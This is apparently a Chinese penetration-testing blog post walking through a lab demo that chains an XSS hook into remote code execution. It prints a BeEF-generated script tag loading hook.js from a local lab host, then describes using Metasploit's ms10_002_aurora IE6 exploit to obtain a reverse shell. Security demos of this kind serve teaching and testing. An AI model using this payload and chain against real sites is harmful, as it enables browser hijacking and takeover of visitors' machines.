网络安全研究员、渗透测试工程师、F11攻防小组创始人
文能社会工程学，武能过狗拿shell
日的了站，做的了饭。
人生格言：即使是咸鱼，也一定是最咸的那条

WeChat

一次xss到rce

发布于 2019-03-18 288 次阅读

本次beef结合msf 完成整个攻击过程
启动beef
beef

xss代码（beef生成）：
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示：

xss执行

配置msf
payload
ms10_002_aurora （ie6 极光漏洞）
配置：

开始监听：

手动游览器执行：

（使用beef重定向到该url也可以）
上线：

反弹shell

Comments

年前的一次授权渗透测试

某学校的一次漏洞挖掘

Author

administrator

网络安全研究员、渗透测试工程师、F11攻防小组创始人
文能社会工程学，武能过狗拿shell
日的了站，做的了饭。
人生格言：即使是咸鱼，也一定是最咸的那条

查看评论 - 1 条评论

Comments | 1 条评论

博主皮皮辞
回复
发布于 2019-03-18 08:36 ( Built-in Browser of WeChat 7.0.3.1400 Android 8.0.0 )( ) 来自: 山西省晋城市 /吕梁市联通
很多往事

Cancel Reply

Markdown Supported while Forbidden

戳我试试 OωO 嘿嘿嘿ヾ(≧∇≦*)ゝ

bilibili~	(=・ω・=)	Tieba

滴，学生卡 | I'm not a robot悄悄话 | Comment in private

切换主题 | SCHEME TOOL